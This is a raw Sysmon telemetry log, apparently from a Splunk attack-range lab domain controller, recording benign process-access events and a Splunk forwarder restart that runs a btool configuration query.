10341000x80000000000000003479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE2-6005-A900-00000000A301}1652C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8EE2-6005-A800-00000000A301}50965104C:\Windows\system32\cmd.exe{59A5CD1D-8EE2-6005-A900-00000000A301}1652C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
154100x80000000000000003475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.268{59A5CD1D-8EE2-6005-A900-00000000A301}1652C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list httpServer --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE2-6005-A800-00000000A301}5096C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list httpServer --no-log 10341000x80000000000000003474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE2-6005-A800-00000000A301}5096C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.248{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE2-6005-A800-00000000A301}5096C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.248{59A5CD1D-8EDF-6005-9E00-00000000A301}47284532C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{59A5CD1D-8EE2-6005-A800-00000000A301}5096C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+17249|C:\Program 
Files\SplunkUniversalForwarder\bin\Splunk.EXE+137ff|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+12176|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+19082|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d94e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.263{59A5CD1D-8EE2-6005-A800-00000000A301}5096C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list httpServer --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EDF-6005-9E00-00000000A301}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2532 10341000x80000000000000003461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.248{59A5CD1D-8EDF-6005-9E00-00000000A301}47284532C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+457e6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+460cb|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+453d6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d925|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program 
Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.983{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE3-6005-BD00-00000000A301}4524C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
